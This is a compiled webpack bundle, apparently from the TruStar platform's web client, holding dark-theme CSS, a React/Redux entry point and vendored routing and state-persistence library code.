!important}.trustar-dark .text-lg-center{text-align:center !important}}@media (min-width: 1200px){.trustar-dark .text-xl-left{text-align:left !important}.trustar-dark .text-xl-right{text-align:right !important}.trustar-dark .text-xl-center{text-align:center !important}}.trustar-dark .text-lowercase{text-transform:lowercase !important}.trustar-dark .text-uppercase{text-transform:uppercase !important}.trustar-dark .text-capitalize{text-transform:capitalize !important}.trustar-dark .font-weight-light{font-weight:300 !important}.trustar-dark .font-weight-lighter{font-weight:lighter !important}.trustar-dark .font-weight-normal{font-weight:400 !important}.trustar-dark .font-weight-bold{font-weight:700 !important}.trustar-dark .font-weight-bolder{font-weight:bolder !important}.trustar-dark .font-italic{font-style:italic !important}.trustar-dark .text-white{color:#fff !important}.trustar-dark .text-primary{color:#3568d5 !important}.trustar-dark a.text-primary:hover,.trustar-dark a.text-primary:focus{color:#21489d !important}.trustar-dark .text-secondary{color:#ff9a6f !important}.trustar-dark a.text-secondary:hover,.trustar-dark a.text-secondary:focus{color:#ff6423 !important}.trustar-dark .text-success{color:#28a745 !important}.trustar-dark a.text-success:hover,.trustar-dark a.text-success:focus{color:#19692c !important}.trustar-dark .text-info{color:#17a2b8 !important}.trustar-dark a.text-info:hover,.trustar-dark a.text-info:focus{color:#0f6674 !important}.trustar-dark .text-warning{color:#ffc107 !important}.trustar-dark a.text-warning:hover,.trustar-dark a.text-warning:focus{color:#ba8b00 !important}.trustar-dark .text-danger{color:#dc3545 !important}.trustar-dark a.text-danger:hover,.trustar-dark a.text-danger:focus{color:#a71d2a !important}.trustar-dark .text-light{color:#eaecf1 !important}.trustar-dark a.text-light:hover,.trustar-dark a.text-light:focus{color:#bcc2d2 !important}.trustar-dark .text-dark{color:#44546a !important}.trustar-dark a.text-dark:hover,.trustar-dark a.text-dark:focus{color:#262f3b !important}.trustar-dark .text-brand-primary{color:#3568d5 !important}.trustar-dark a.text-brand-primary:hover,.trustar-dark a.text-brand-primary:focus{color:#21489d !important}.trustar-dark .text-brand-secondary{color:#ff9a6f !important}.trustar-dark a.text-brand-secondary:hover,.trustar-dark a.text-brand-secondary:focus{color:#ff6423 !important}.trustar-dark .text-functional-success{color:#417505 !important}.trustar-dark a.text-functional-success:hover,.trustar-dark a.text-functional-success:focus{color:#182c02 !important}.trustar-dark .text-functional-info{color:#4a90e2 !important}.trustar-dark a.text-functional-info:hover,.trustar-dark a.text-functional-info:focus{color:#1f69c1 !important}.trustar-dark .text-functional-warning{color:#f5a623 !important}.trustar-dark a.text-functional-warning:hover,.trustar-dark a.text-functional-warning:focus{color:#c37d09 !important}.trustar-dark .text-functional-danger{color:#d0021b !important}.trustar-dark a.text-functional-danger:hover,.trustar-dark a.text-functional-danger:focus{color:#840111 !important}.trustar-dark .text-functional-accept{color:#fff !important}.trustar-dark a.text-functional-accept:hover,.trustar-dark a.text-functional-accept:focus{color:#d9d9d9 !important}.trustar-dark .text-functional-decline{color:#fff !important}.trustar-dark a.text-functional-decline:hover,.trustar-dark a.text-functional-decline:focus{color:#d9d9d9 !important}.trustar-dark .text-operational-critical{color:#fff !important}.trustar-dark a.text-operational-critical:hover,.trustar-dark a.text-operational-critical:focus{color:#d9d9d9 !important}.trustar-dark .text-operational-error{color:#fff !important}.trustar-dark a.text-operational-error:hover,.trustar-dark a.text-operational-error:focus{color:#d9d9d9 !important}.trustar-dark .text-operational-warning{color:#fff !important}.trustar-dark a.text-operational-warning:hover,.trustar-dark a.text-operational-warning:focus{color:#d9d9d9 !important}.trustar-dark .text-operational-info{color:#fff !important}.trustar-dark a.text-operational-info:hover,.trustar-dark a.text-operational-info:focus{color:#d9d9d9 !important}.trustar-dark .text-body{color:#212529 !important}.trustar-dark .text-muted{color:#6c757d !important}.trustar-dark .text-black-50{color:rgba(0,0,0,0.5) !important}.trustar-dark .text-white-50{color:rgba(255,255,255,0.5) !important}.trustar-dark .text-hide{font:0/0 a;color:transparent;text-shadow:none;background-color:transparent;border:0}.trustar-dark .text-decoration-none{text-decoration:none !important}.trustar-dark .text-reset{color:inherit !important}.trustar-dark .visible{visibility:visible !important}.trustar-dark .invisible{visibility:hidden !important}@media print{.trustar-dark *,.trustar-dark *::before,.trustar-dark *::after{text-shadow:none !important;box-shadow:none !important}.trustar-dark a:not(.btn){text-decoration:underline}.trustar-dark abbr[title]::after{content:\" (\" attr(title) \")\"}.trustar-dark pre{white-space:pre-wrap !important}.trustar-dark pre,.trustar-dark blockquote{border:1px solid #adb5bd;page-break-inside:avoid}.trustar-dark thead{display:table-header-group}.trustar-dark tr,.trustar-dark img{page-break-inside:avoid}.trustar-dark p,.trustar-dark h2,.trustar-dark h3{orphans:3;widows:3}.trustar-dark h2,.trustar-dark h3{page-break-after:avoid}@page{.trustar-dark{size:a3}}.trustar-dark body{min-width:992px !important}.trustar-dark .container{min-width:992px !important}.trustar-dark .navbar{display:none}.trustar-dark .badge{border:1px solid #000}.trustar-dark .table{border-collapse:collapse !important}.trustar-dark .table td,.trustar-dark .table th{background-color:#fff !important}.trustar-dark .table-bordered th,.trustar-dark .table-bordered td{border:1px solid #dee2e6 !important}.trustar-dark .table-dark{color:inherit}.trustar-dark .table-dark th,.trustar-dark .table-dark td,.trustar-dark .table-dark thead th,.trustar-dark .table-dark tbody+tbody{border-color:#dee2e6}.trustar-dark .table .thead-dark th{color:inherit;border-color:#dee2e6}}.trustar-dark .no-user-select{-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.trustar-dark button:focus,.trustar-dark a:focus{outline:0}.trustar-dark a,.trustar-dark a:hover{text-decoration:none;color:white}.trustar-dark h1,.trustar-dark .h1{font-size:2rem;margin:.667rem 0rem}.trustar-dark h2,.trustar-dark .h2{font-size:1.5rem;margin:.667rem 0rem}.trustar-dark h3,.trustar-dark .h3{font-size:1.167rem;margin:0rem}.trustar-dark h4,.trustar-dark .h4{font-size:1rem;margin:0rem}.trustar-dark h5,.trustar-dark .h5{font-size:.833rem;margin:0rem}.trustar-dark h6,.trustar-dark .h6{font-size:.667rem;margin:0rem}.trustar-dark .dropdown-item{color:#000;color:initial}.trustar-dark .dropdown-menu{background-color:transparent;background-color:initial}.trustar-dark button{margin:0;margin:initial;font-size:medium;font-size:initial;line-height:normal;line-height:initial}.trustar-dark button:focus{outline:none}.trustar-dark{color:#f7f7f7}@font-face{font-family:'SplunkDataSans';src:url(\"/Users/om/Documents/code/trustar-platform/modules/station-web-client/web_modules/trustar-2.0/themes/common/assets/fonts/SplunkDataSans-regular.woff2\") format(\"woff2\");font-weight:400;font-style:normal}@font-face{font-family:'SplunkDataSans';src:url(\"/Users/om/Documents/code/trustar-platform/modules/station-web-client/web_modules/trustar-2.0/themes/common/assets/fonts/SplunkDataSans-medium.woff2\") format(\"woff2\");font-weight:500;font-style:normal}@font-face{font-family:'SplunkDataSans';src:url(\"/Users/om/Documents/code/trustar-platform/modules/station-web-client/web_modules/trustar-2.0/themes/common/assets/fonts/SplunkDataSans-medium.woff2\") format(\"woff2\");font-weight:600;font-style:normal}@font-face{font-family:'SplunkDataSans';src:url(\"/Users/om/Documents/code/trustar-platform/modules/station-web-client/web_modules/trustar-2.0/themes/common/assets/fonts/SplunkDataSans-bold.woff2\") format(\"woff2\");font-weight:700;font-style:normal}@font-face{font-family:'SplunkDataSans';src:url(\"/Users/om/Documents/code/trustar-platform/modules/station-web-client/web_modules/trustar-2.0/themes/common/assets/fonts/SplunkDataSans-bold.woff2\") format(\"woff2\");font-weight:800;font-style:normal}@font-face{font-family:'SplunkDataSansMono';src:url(\"/Users/om/Documents/code/trustar-platform/modules/station-web-client/web_modules/trustar-2.0/themes/common/assets/fonts/SplunkDataSansMono-regular.woff2\") format(\"woff2\");font-weight:400;font-style:normal}html,body{font-size:12px;font-family:'SplunkDataSans', Helvetica, Arial, sans-serif;height:100%}.modal{display:inline;display:initial}.no-user-select{-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}button:focus,a:focus{outline:0}a,a:hover{text-decoration:none}.tooltip.show{z-index:500}\n", ""]);

// exports


/***/ }),
/* 1676 */
/***/ (function(module, exports) {

// removed by extract-text-webpack-plugin

/***/ }),
/* 1677 */
/***/ (function(module, exports) {

// removed by extract-text-webpack-plugin

/***/ }),
/* 1678 */
/***/ (function(module, exports) {

// removed by extract-text-webpack-plugin

/***/ }),
/* 1679 */,
/* 1680 */,
/* 1681 */,
/* 1682 */,
/* 1683 */,
/* 1684 */,
/* 1685 */,
/* 1686 */,
/* 1687 */,
/* 1688 */,
/* 1689 */,
/* 1690 */,
/* 1691 */,
/* 1692 */,
/* 1693 */,
/* 1694 */,
/* 1695 */,
/* 1696 */,
/* 1697 */,
/* 1698 */,
/* 1699 */,
/* 1700 */,
/* 1701 */,
/* 1702 */,
/* 1703 */,
/* 1704 */,
/* 1705 */,
/* 1706 */,
/* 1707 */,
/* 1708 */,
/* 1709 */,
/* 1710 */,
/* 1711 */,
/* 1712 */,
/* 1713 */,
/* 1714 */,
/* 1715 */,
/* 1716 */,
/* 1717 */,
/* 1718 */,
/* 1719 */,
/* 1720 */,
/* 1721 */,
/* 1722 */,
/* 1723 */,
/* 1724 */,
/* 1725 */,
/* 1726 */,
/* 1727 */,
/* 1728 */,
/* 1729 */,
/* 1730 */,
/* 1731 */,
/* 1732 */,
/* 1733 */,
/* 1734 */,
/* 1735 */,
/* 1736 */,
/* 1737 */,
/* 1738 */,
/* 1739 */,
/* 1740 */,
/* 1741 */,
/* 1742 */,
/* 1743 */,
/* 1744 */,
/* 1745 */,
/* 1746 */,
/* 1747 */,
/* 1748 */,
/* 1749 */,
/* 1750 */,
/* 1751 */,
/* 1752 */,
/* 1753 */,
/* 1754 */,
/* 1755 */,
/* 1756 */,
/* 1757 */,
/* 1758 */,
/* 1759 */,
/* 1760 */,
/* 1761 */,
/* 1762 */,
/* 1763 */,
/* 1764 */,
/* 1765 */,
/* 1766 */,
/* 1767 */,
/* 1768 */,
/* 1769 */,
/* 1770 */,
/* 1771 */,
/* 1772 */,
/* 1773 */,
/* 1774 */,
/* 1775 */,
/* 1776 */,
/* 1777 */,
/* 1778 */,
/* 1779 */,
/* 1780 */,
/* 1781 */,
/* 1782 */,
/* 1783 */,
/* 1784 */,
/* 1785 */,
/* 1786 */,
/* 1787 */,
/* 1788 */,
/* 1789 */,
/* 1790 */,
/* 1791 */,
/* 1792 */,
/* 1793 */,
/* 1794 */,
/* 1795 */,
/* 1796 */,
/* 1797 */,
/* 1798 */,
/* 1799 */,
/* 1800 */,
/* 1801 */,
/* 1802 */,
/* 1803 */,
/* 1804 */,
/* 1805 */,
/* 1806 */,
/* 1807 */,
/* 1808 */,
/* 1809 */,
/* 1810 */,
/* 1811 */,
/* 1812 */,
/* 1813 */,
/* 1814 */,
/* 1815 */,
/* 1816 */,
/* 1817 */,
/* 1818 */,
/* 1819 */,
/* 1820 */,
/* 1821 */,
/* 1822 */,
/* 1823 */,
/* 1824 */,
/* 1825 */,
/* 1826 */,
/* 1827 */,
/* 1828 */,
/* 1829 */,
/* 1830 */,
/* 1831 */,
/* 1832 */,
/* 1833 */,
/* 1834 */,
/* 1835 */,
/* 1836 */,
/* 1837 */,
/* 1838 */,
/* 1839 */,
/* 1840 */,
/* 1841 */,
/* 1842 */,
/* 1843 */,
/* 1844 */,
/* 1845 */,
/* 1846 */,
/* 1847 */,
/* 1848 */,
/* 1849 */,
/* 1850 */,
/* 1851 */,
/* 1852 */,
/* 1853 */,
/* 1854 */,
/* 1855 */,
/* 1856 */,
/* 1857 */,
/* 1858 */,
/* 1859 */,
/* 1860 */,
/* 1861 */,
/* 1862 */,
/* 1863 */,
/* 1864 */,
/* 1865 */,
/* 1866 */,
/* 1867 */,
/* 1868 */,
/* 1869 */,
/* 1870 */,
/* 1871 */,
/* 1872 */,
/* 1873 */,
/* 1874 */,
/* 1875 */,
/* 1876 */,
/* 1877 */,
/* 1878 */,
/* 1879 */,
/* 1880 */,
/* 1881 */,
/* 1882 */,
/* 1883 */,
/* 1884 */,
/* 1885 */,
/* 1886 */,
/* 1887 */,
/* 1888 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_dom__ = __webpack_require__(65);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_dom___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_react_dom__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_react_hot_loader__ = __webpack_require__(1893);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_react_hot_loader___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_react_hot_loader__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_react_router__ = __webpack_require__(98);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_react_router_redux__ = __webpack_require__(100);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_react_router_redux___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_react_router_redux__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_redux_persist_immutable__ = __webpack_require__(966);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_redux_persist_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_redux_persist_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__createStore_js__ = __webpack_require__(1938);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__modules__ = __webpack_require__(996);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__Root_js__ = __webpack_require__(3441);







/* Create Redux Store & local persistance layer */






// NOTE: We don't seem to need to deserialize since we're using persist-immutable
var rehydrationTransform = Object(__WEBPACK_IMPORTED_MODULE_5_redux_persist_immutable__["createTransform"])(__WEBPACK_IMPORTED_MODULE_7__modules__["c" /* rootSerializer */], // transform state coming from redux on its way to being serialized and stored
function (outgoing, key) {
  return outgoing;
} // transform state coming from storage, on its way to be rehydrated into redux
);

// Pass in browserHistory for routerMiddleware
var store = Object(__WEBPACK_IMPORTED_MODULE_6__createStore_js__["a" /* default */])(__WEBPACK_IMPORTED_MODULE_3_react_router__["browserHistory"]);

Object(__WEBPACK_IMPORTED_MODULE_5_redux_persist_immutable__["persistStore"])(store, {
  whitelist: __WEBPACK_IMPORTED_MODULE_7__modules__["c" /* rootSerializer */].keys,
  transforms: [rehydrationTransform]
});

var history = Object(__WEBPACK_IMPORTED_MODULE_4_react_router_redux__["syncHistoryWithStore"])(__WEBPACK_IMPORTED_MODULE_3_react_router__["browserHistory"], store, {
  selectLocationState: function selectLocationState(state) {
    return state.get('router');
  }
});

/* Exposes globals. Debug module is exposed everywhere */
window.__$debug = __webpack_require__(7);

window.addEventListener('unhandledrejection', function (event) {
  console.warn('UNHANDLED PROMISE REJECTION: ' + event.reason);
  if (event.reason.toString().match('Error: Loading chunk .* failed.')) {
    window.location.reload();
    event.preventDefault();
  }
});

if ("production" === 'development' || window.Cypress) {
  __webpack_require__(4075)(window, {
    store: store,
    _history: history,
    s: function s() {
      return store.getState().toJS();
    },
    state: function state(kp) {
      return kp ? store.getState().getIn(kp) : store.getState();
    }
  });
}

var renderDOM = function renderDOM(Component) {
  if (false) {
    render(React.createElement(
      AppContainer,
      { warnings: false },
      React.createElement(Component, {
        store: store,
        history: history
      })
    ), document.getElementById('root'));
  } else {
    Object(__WEBPACK_IMPORTED_MODULE_1_react_dom__["render"])(__WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(Component, {
      store: store,
      history: history
    }), document.getElementById('root'));
  }
};

// Render the App! NOTE: This will only be called this once in prod. In dev we
// hot reload (see below)
renderDOM(__WEBPACK_IMPORTED_MODULE_8__Root_js__["a" /* default */]);

// Enable hot reloading (only in dev)
if (false) {
  // $FlowIgnore
  module.hot.accept('./Root.js', function () {
    renderDOM(Root);
  });
}

/***/ }),
/* 1889 */,
/* 1890 */,
/* 1891 */,
/* 1892 */,
/* 1893 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = __webpack_require__(1894)


/***/ }),
/* 1894 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";


/* eslint-disable global-require */

if (true) {
  module.exports = __webpack_require__(1895);
} else {
  module.exports = require('./index.dev');
}

/***/ }),
/* 1895 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";


module.exports.AppContainer = __webpack_require__(1896);

/***/ }),
/* 1896 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";


/* eslint-disable global-require */

if (true) {
  module.exports = __webpack_require__(1897);
} else {
  module.exports = require('./AppContainer.dev');
}

/***/ }),
/* 1897 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";


var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }

/* eslint-disable react/prop-types */

var React = __webpack_require__(0);

var Component = React.Component;

var AppContainer = function (_Component) {
  _inherits(AppContainer, _Component);

  function AppContainer() {
    _classCallCheck(this, AppContainer);

    return _possibleConstructorReturn(this, (AppContainer.__proto__ || Object.getPrototypeOf(AppContainer)).apply(this, arguments));
  }

  _createClass(AppContainer, [{
    key: 'render',
    value: function render() {
      if (this.props.component) {
        return React.createElement(this.props.component, this.props.props);
      }

      return React.Children.only(this.props.children);
    }
  }]);

  return AppContainer;
}(Component);

module.exports = AppContainer;

/***/ }),
/* 1898 */,
/* 1899 */,
/* 1900 */,
/* 1901 */,
/* 1902 */,
/* 1903 */,
/* 1904 */,
/* 1905 */,
/* 1906 */,
/* 1907 */,
/* 1908 */,
/* 1909 */,
/* 1910 */,
/* 1911 */,
/* 1912 */,
/* 1913 */,
/* 1914 */,
/* 1915 */,
/* 1916 */,
/* 1917 */,
/* 1918 */,
/* 1919 */,
/* 1920 */,
/* 1921 */,
/* 1922 */,
/* 1923 */,
/* 1924 */,
/* 1925 */,
/* 1926 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";


Object.defineProperty(exports, "__esModule", {
  value: true
});

var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

exports['default'] = syncHistoryWithStore;

var _reducer = __webpack_require__(964);

var defaultSelectLocationState = function defaultSelectLocationState(state) {
  return state.routing;
};

/**
 * This function synchronizes your history state with the Redux store.
 * Location changes flow from history to the store. An enhanced history is
 * returned with a listen method that responds to store updates for location.
 *
 * When this history is provided to the router, this means the location data
 * will flow like this:
 * history.push -> store.dispatch -> enhancedHistory.listen -> router
 * This ensures that when the store state changes due to a replay or other
 * event, the router will be updated appropriately and can transition to the
 * correct router state.
 */
function syncHistoryWithStore(history, store) {
  var _ref = arguments.length > 2 && arguments[2] !== undefined ? arguments[2] : {},
      _ref$selectLocationSt = _ref.selectLocationState,
      selectLocationState = _ref$selectLocationSt === undefined ? defaultSelectLocationState : _ref$selectLocationSt,
      _ref$adjustUrlOnRepla = _ref.adjustUrlOnReplay,
      adjustUrlOnReplay = _ref$adjustUrlOnRepla === undefined ? true : _ref$adjustUrlOnRepla;

  // Ensure that the reducer is mounted on the store and functioning properly.
  if (typeof selectLocationState(store.getState()) === 'undefined') {
    throw new Error('Expected the routing state to be available either as `state.routing` ' + 'or as the custom expression you can specify as `selectLocationState` ' + 'in the `syncHistoryWithStore()` options. ' + 'Ensure you have added the `routerReducer` to your store\'s ' + 'reducers via `combineReducers` or whatever method you use to isolate ' + 'your reducers.');
  }

  var initialLocation = void 0;
  var isTimeTraveling = void 0;
  var unsubscribeFromStore = void 0;
  var unsubscribeFromHistory = void 0;
  var currentLocation = void 0;

  // What does the store say about current location?
  var getLocationInStore = function getLocationInStore(useInitialIfEmpty) {
    var locationState = selectLocationState(store.getState());
    return locationState.locationBeforeTransitions || (useInitialIfEmpty ? initialLocation : undefined);
  };

  // Init initialLocation with potential location in store
  initialLocation = getLocationInStore();

  // If the store is replayed, update the URL in the browser to match.
  if (adjustUrlOnReplay) {
    var handleStoreChange = function handleStoreChange() {
      var locationInStore = getLocationInStore(true);
      if (currentLocation === locationInStore || initialLocation === locationInStore) {
        return;
      }

      // Update address bar to reflect store state
      isTimeTraveling = true;
      currentLocation = locationInStore;
      history.transitionTo(_extends({}, locationInStore, {
        action: 'PUSH'
      }));
      isTimeTraveling = false;
    };

    unsubscribeFromStore = store.subscribe(handleStoreChange);
    handleStoreChange();
  }

  // Whenever location changes, dispatch an action to get it in the store
  var handleLocationChange = function handleLocationChange(location) {
    // ... unless we just caused that location change
    if (isTimeTraveling) {
      return;
    }

    // Remember where we are
    currentLocation = location;

    // Are we being called for the first time?
    if (!initialLocation) {
      // Remember as a fallback in case state is reset
      initialLocation = location;

      // Respect persisted location, if any
      if (getLocationInStore()) {
        return;
      }
    }

    // Tell the store to update by dispatching an action
    store.dispatch({
      type: _reducer.LOCATION_CHANGE,
      payload: location
    });
  };
  unsubscribeFromHistory = history.listen(handleLocationChange);

  // History 3.x doesn't call listen synchronously, so fire the initial location change ourselves
  if (history.getCurrentLocation) {
    handleLocationChange(history.getCurrentLocation());
  }

  // The enhanced history uses store as source of truth
  return _extends({}, history, {
    // The listeners are subscribed to the store instead of history
    listen: function listen(listener) {
      // Copy of last location.
      var lastPublishedLocation = getLocationInStore(true);

      // Keep track of whether we unsubscribed, as Redux store
      // only applies changes in subscriptions on next dispatch
      var unsubscribed = false;
      var unsubscribeFromStore = store.subscribe(function () {
        var currentLocation = getLocationInStore(true);
        if (currentLocation === lastPublishedLocation) {
          return;
        }
        lastPublishedLocation = currentLocation;
        if (!unsubscribed) {
          listener(lastPublishedLocation);
        }
      });

      // History 2.x listeners expect a synchronous call. Make the first call to the
      // listener after subscribing to the store, in case the listener causes a
      // location change (e.g. when it redirects)
      if (!history.getCurrentLocation) {
        listener(lastPublishedLocation);
      }

      // Let user unsubscribe later
      return function () {
        unsubscribed = true;
        unsubscribeFromStore();
      };
    },


    // It also provides a way to destroy internal listeners
    unsubscribe: function unsubscribe() {
      if (adjustUrlOnReplay) {
        unsubscribeFromStore();
      }
      unsubscribeFromHistory();
    }
  });
}

/***/ }),
/* 1927 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";


Object.defineProperty(exports, "__esModule", {
  value: true
});
exports['default'] = routerMiddleware;

var _actions = __webpack_require__(965);

function _toConsumableArray(arr) { if (Array.isArray(arr)) { for (var i = 0, arr2 = Array(arr.length); i < arr.length; i++) { arr2[i] = arr[i]; } return arr2; } else { return Array.from(arr); } }

/**
 * This middleware captures CALL_HISTORY_METHOD actions to redirect to the
 * provided history object. This will prevent these actions from reaching your
 * reducer or any middleware that comes after this one.
 */
function routerMiddleware(history) {
  return function () {
    return function (next) {
      return function (action) {
        if (action.type !== _actions.CALL_HISTORY_METHOD) {
          return next(action);
        }

        var _action$payload = action.payload,
            method = _action$payload.method,
            args = _action$payload.args;

        history[method].apply(history, _toConsumableArray(args));
      };
    };
  };
}

/***/ }),
/* 1928 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = autoRehydrate;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__constants__ = __webpack_require__(262);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_isStatePlainEnough__ = __webpack_require__(1929);
var _typeof = typeof Symbol === "function" && typeof Symbol.iterator === "symbol" ? function (obj) { return typeof obj; } : function (obj) { return obj && typeof Symbol === "function" && obj.constructor === Symbol && obj !== Symbol.prototype ? "symbol" : typeof obj; };

var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };




function autoRehydrate() {
  var config = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};

  var stateReconciler = config.stateReconciler || defaultStateReconciler;

  return function (next) {
    return function (reducer, initialState, enhancer) {
      var store = next(liftReducer(reducer), initialState, enhancer);
      return _extends({}, store, {
        replaceReducer: function replaceReducer(reducer) {
          return store.replaceReducer(liftReducer(reducer));
        }
      });
    };
  };

  function liftReducer(reducer) {
    var rehydrated = false;
    var preRehydrateActions = [];
    return function (state, action) {
      if (action.type !== __WEBPACK_IMPORTED_MODULE_0__constants__["REHYDRATE"]) {
        if (config.log && !rehydrated) preRehydrateActions.push(action); // store pre-rehydrate actions for debugging
        return reducer(state, action);
      } else {
        if (config.log && !rehydrated) logPreRehydrate(preRehydrateActions);
        rehydrated = true;

        var inboundState = action.payload;
        var reducedState = reducer(state, action);

        return stateReconciler(state, inboundState, reducedState, config.log);
      }
    };
  }
}

function logPreRehydrate(preRehydrateActions) {
  var concernedActions = preRehydrateActions.slice(1);
  if (concernedActions.length > 0) {
    console.log('\n      redux-persist/autoRehydrate: %d actions were fired before rehydration completed. This can be a symptom of a race\n      condition where the rehydrate action may overwrite the previously affected state. Consider running these actions\n      after rehydration:\n    ', concernedActions.length, concernedActions);
  }
}

function defaultStateReconciler(state, inboundState, reducedState, log) {
  var newState = _extends({}, reducedState);

  Object.keys(inboundState).forEach(function (key) {
    // if initialState does not have key, skip auto rehydration
    if (!state.hasOwnProperty(key)) return;

    // if initial state is an object but inbound state is null/undefined, skip
    if (_typeof(state[key]) === 'object' && !inboundState[key]) {
      if (log) console.log('redux-persist/autoRehydrate: sub state for key `%s` is falsy but initial state is an object, skipping autoRehydrate.', key);
      return;
    }

    // if reducer modifies substate, skip auto rehydration
    if (state[key] !== reducedState[key]) {
      if (log) console.log('redux-persist/autoRehydrate: sub state for key `%s` modified, skipping autoRehydrate.', key);
      newState[key] = reducedState[key];
      return;
    }

    // otherwise take the inboundState
    if (Object(__WEBPACK_IMPORTED_MODULE_1__utils_isStatePlainEnough__["a" /* default */])(inboundState[key]) && Object(__WEBPACK_IMPORTED_MODULE_1__utils_isStatePlainEnough__["a" /* default */])(state[key])) newState[key] = _extends({}, state[key], inboundState[key]); // shallow merge
    else newState[key] = inboundState[key]; // hard set

    if (log) console.log('redux-persist/autoRehydrate: key `%s`, rehydrated to ', key, newState[key]);
  });
  return newState;
}

/***/ }),
/* 1929 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = isStatePlainEnough;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_lodash_es_isPlainObject__ = __webpack_require__(434);
var _typeof = typeof Symbol === "function" && typeof Symbol.iterator === "symbol" ? function (obj) { return typeof obj; } : function (obj) { return obj && typeof Symbol === "function" && obj.constructor === Symbol && obj !== Symbol.prototype ? "symbol" : typeof obj; };



function isStatePlainEnough(a) {
  // isPlainObject + duck type not immutable
  if (!a) return false;
  if ((typeof a === 'undefined' ? 'undefined' : _typeof(a)) !== 'object') return false;
  if (typeof a.asMutable === 'function') return false;
  if (!Object(__WEBPACK_IMPORTED_MODULE_0_lodash_es_isPlainObject__["a" /* default */])(a)) return false;
  return true;
}

/***/ }),
/* 1930 */,
/* 1931 */,
/* 1932 */
/***/ (function(module, exports) {

exports = module.exports = stringify
exports.getSerialize = serializer

function stringify(obj, replacer, spaces, cycleReplacer) {
  return JSON.stringify(obj, serializer(replacer, cycleReplacer), spaces)
}

function serializer(replacer, cycleReplacer) {
  var stack = [], keys = []

  if (cycleReplacer == null) cycleReplacer = function(key, value) {
    if (stack[0] === value) return "[Circular ~]"
    return "[Circular ~." + keys.slice(0, stack.indexOf(value)).join(".") + "]"
  }

  return function(key, value) {
    if (stack.length > 0) {
      var thisPos = stack.indexOf(this)
      ~thisPos ? stack.splice(thisPos + 1) : stack.push(this)
      ~thisPos ? keys.splice(thisPos, Infinity, key) : keys.push(key)
      if (~stack.indexOf(value)) value = cycleReplacer.call(this, key, value)
    }
    else stack.push(value)

    return replacer == null ? value : replacer.call(this, key, value)
  }
}


/***/ }),
/* 1933 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
function createTransform(inbound, outbound) {
  var config = arguments.length > 2 && arguments[2] !== undefined ? arguments[2] : {};

  var whitelist = config.whitelist || null;
  var blacklist = config.blacklist || null;

  function whitelistBlacklistCheck(key) {
    if (whitelist && whitelist.indexOf(key) === -1) return true;
    if (blacklist && blacklist.indexOf(key) !== -1) return true;
    return false;
  }

  return {
    in: function _in(state, key) {
      return !whitelistBlacklistCheck(key) && inbound ? inbound(state, key) : state;
    },
    out: function out(state, key) {
      return !whitelistBlacklistCheck(key) && outbound ? outbound(state, key) : state;
    }
  };
}

